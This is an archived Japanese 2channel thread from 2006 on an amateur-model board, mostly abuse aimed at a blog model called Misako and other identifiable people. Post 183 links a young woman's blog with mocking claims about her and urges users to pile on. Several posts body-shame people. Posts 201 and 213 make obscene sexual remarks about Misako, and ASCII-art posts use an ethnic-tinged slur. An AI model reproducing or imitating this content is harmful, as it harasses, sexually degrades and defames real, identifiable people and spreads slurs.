↑貴様はひっこんどれ。チンカス野郎が!

180 :無名モデル:2006/11/27(月) 00:33:12 ID:???
ブログで久々にこの人見たんですけど
一体どうしたんですか!?ってレベルで顔が垢抜けて?可愛くなってたんですけど…
いつ、どこをいじったの?
自然にかわいくなったの?
とりあえず、昔みたいに筋肉っぽいごつい顔(笑)じゃなくなってる…

181 :無名モデル:2006/11/27(月) 00:51:46 ID:???
ブタは生きたまま首ちょん切られて食肉加工されるの?
ブタ小屋が臭いのは生きるための必死のアピールなんだろな
俺たちは臭いぞ臭いぞ、だから食べないでって
ブタのオーラは強いよな
ブタは食べられることで霊となり、
食べた人に取り憑いて生きようとするかもな
たまにブタに似た人っているよね
そんな人は前世がブタか、ブタに取り憑かれた人かもね
そんなブタの霊がいるとしたら、
人間を騙すことになんのためらいも痛みもないし、
愛を説いて殺生をやめさせるかもな




182 :無名モデル:2006/11/28(火) 17:48:27 ID:???
ブートン
http://stat.ameba.jp/user_images/f5/12/10012474516.jpg
丸焼き

183 :もも姫:2006/11/28(火) 19:34:02 ID:???
http://yaplog.jp/v_v-momo-hime/

自称かわいいのもも姫
将来の夢、ドクモ→ショップスタッフ→認められて自分の店持つ
昔の夢、歌手・女優
ドイツ在住
おしゃれ大好き
勘違いヤロー
もうすぐ日本帰国

まるでアノ元ブログ女王まお

ブログではいい姫ぶってるけど、実は男遊び大好き姫

自分は相当センスいけてると思ってる

ネイルにデコ電、キヨウなもも姫は自分の私物も友達のものまでなんでも
かわいくできちゃうと自慢
モモ姫に任せてくれればなんでもかわいくなる!!と断言しっぱなし

こんなこを次のカリスマドクモに2チャンで有名にしてあげよう☆


184 :無名モデル:2006/11/28(火) 21:37:44 ID:???
パクリが悪いんじゃない。
パクリなのにオリジナルだと詐称するのが悪いのだ。
救世教から分派したならそうと公言すればそれでいいんだよ。
公言していれば誰もつっこんだりしないよ。

それを隠して「自分が元祖」と嘘言うことが問題なの。
盗作した洋画家と同じだよ。指摘されても認めないところが真光と同じだね。

再度言っておく、真光は茂吉から手かざしを盗作した。
そして、証拠がそろってもまだそれを認めようとしない。
盗作日本画家と同じだってね。



185 :無名モデル:2006/11/29(水) 12:46:22 ID:???
http://h.pic.to/204hz
3年まえ

186 :ロンブー:2006/11/30(木) 17:56:53 ID:???
rn
  r「l l h                豚キム!豚キム!
  | 、. !j
  ゝ .f         _         豚キム!豚キム!
  |  |       ,r'⌒  ⌒ヽ、   
  ,」  L_     f ,,r' ̄ ̄ヾ. ヽ. 
 ヾー‐' |     ゞ‐=H:=‐fー)r、)  豚キム!豚キム! 
  |   じ、     ゙iー'・・ー' i.トソ    
  \    \.     l、 r==i ,; |'  .   豚キム!豚キム!
   \   ノリ^ー->==__,..-‐ヘ___
     \  ノ ハヽ  |_/oヽ__/     /\
      \  /    /        /  |.
        y'    /o     O  ,l    |


187 :無名モデル:2006/11/30(木) 17:59:43 ID:EctVJ+uQ
もはや冗談としか思えない
ウエスト70超え決定!

http://littleberry.cc/?prid=2483423&ss=b459adc9baaca7048b814d2618a3b831

188 :無名モデル:2006/12/01(金) 21:47:54 ID:???
↑貴様はひっこんどれ。チン毛野郎が

189 :無名モデル:2006/12/02(土) 11:46:43 ID:JXEoyv4o
毎回同じでつまんない。

190 :無名モデル:2006/12/03(日) 00:54:51 ID:pEL7p6a1
浅田舞&安藤美姫のプリクラなんだがブラ見えてる
http://omoshirogazou.up.seesaa.net/image/A4DFA4ADA1F5A4DEA4A4.jpg

191 :無名モデル:2006/12/03(日) 01:08:09 ID:???
↑おのれはすっこんどれチンカスが

192 :無名モデル:2006/12/03(日) 15:00:07 ID:pEL7p6a1
この勘違いデカ顔さんが、村上さんが長瀬似と信じてやまない弟さんです
http://m.ameblo.jp/m/blogArticle.do?amebaId=&sessionId=&articleId=10020922930

193 :無名モデル:2006/12/03(日) 15:56:40 ID:???
 ∧_∧ いくわよ!
  ( ・∀・)   | | ガッ
 と    )   | |
   Y /ノ    人
    / )    <  >_∧∩
  _/し' //. Vヽ`Д´>/ ←>>デブ上
 (_フ彡        /

194 :無名モデル:2006/12/03(日) 16:02:05 ID:???
 ∧_∧ いくわよ!
  ( ・∀・)   | | ガッ
 と    )   | |
   Y /ノ    人
    / )    <  >_∧∩
  _/し' //. Vヽ`Д´>/ ←>>デブ上
 (_フ彡        /

195 :無名モデル:2006/12/03(日) 16:10:57 ID:???
 ∧_∧ いくわよ!
  ( ・∀・)   | | ガッ
 と    )   | |
   Y /ノ    人
    / )    <  >_∧∩
  _/し' //. Vヽ`Д´>/ ←>>デブ上
 (_フ彡        /

196 :無名モデル:2006/12/03(日) 22:54:42 ID:???
↑ おのれはすっこんどれチンカスが

197 :無名モデル:2006/12/08(金) 23:06:22 ID:HGq4aJpt
みさこちゃんて誰と付き合ってるんですか!?

198 :無名モデル:2006/12/09(土) 20:08:18 ID:???

養豚場のぶー太くんです

199 :無名モデル:2006/12/09(土) 21:52:22 ID:???
美沙子さんは只今裁判の準備中です

200 :無名モデル:2006/12/11(月) 10:21:56 ID:jSTMXmjB
栽培はしないだろうね。

201 :無名モデル:2006/12/11(月) 17:00:27 ID:???
/⌒⌒⌒⌒⌒⌒ ))    
  (   从    ノ.ノ      
   ( ./  ̄ ̄ ̄ ̄\        
   |::::::  ヽ     丶.  
   |::::.____、_  _,__)   
  (∂: ̄ ̄| ・ー |=|・ー |    みさタンのマン汁
   (  (   ̄ )・・( ̄ i     ジュルジュルっと
   ヘ\   .._. )3( .._丿     ススっちゃうよん
 /  \ヽ _二__ノ|\       
/⌒ヽ.   \__/\i/\_|      
|   ヽ       \o \
|    |          \o \


202 :無名モデル:2006/12/13(水) 18:16:11 ID:Gl5/+IuW
ぶさage

203 :無名モデル:2006/12/13(水) 23:10:57 ID:shvYEX15
変なん沸いてるし。

204 :無名モデル:2006/12/15(金) 15:24:19 ID:SOQa3lAl
Little Berry最高かな?☆

205 :無名モデル:2006/12/15(金) 17:38:21 ID:???
不飛べきもいーーーー
ガラクタや

206 :無名モデル:2006/12/15(金) 23:48:47 ID:???
このスレ、アンチスレじゃないのにアンチスレ化してるよね。

207 :無名モデル:2006/12/16(土) 00:34:10 ID:???
アンチしかいませんから

208 :無名モデル:2006/12/16(土) 01:54:15 ID:???
新スレマダー?

209 :無名モデル:2006/12/16(土) 13:18:50 ID:???
rn
  r「l l h                
  | 、. !j
  ゝ .f         _         
  |  |       ,r'⌒  ⌒ヽ、   
  ,」  L_     f ,,r' ̄ ̄ヾ. ヽ.  北の国(キム)から
 ヾー‐' |     ゞ‐=H:=‐fー)r、) 
  |   じ、     ゙iー'・・ー' i.トソ    
  \    \.     l、 r==i ,; |'  .   
   \   ノリ^ー->==__,..-‐ヘ___
     \  ノ ハヽ  |_/oヽ__/     /\
      \  /    /        /  |.
        y'    /o     O  ,l    |



210 :無名モデル:2006/12/16(土) 14:05:39 ID:???
>>207ナイス突っ込み!

211 :無名モデル:2006/12/16(土) 15:27:14 ID:t3UTLL5Z
新スレできたよ。

212 :無名モデル:2006/12/22(金) 06:12:03 ID:Y+Ia3HUV
今日はバースデーパーティーだね!
それから、けっこうかわいい…!!☆

213 :無名モデル:2006/12/26(火) 04:52:14 ID:???
みさこのまんこの中から溢れ出すウジムシ


37 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)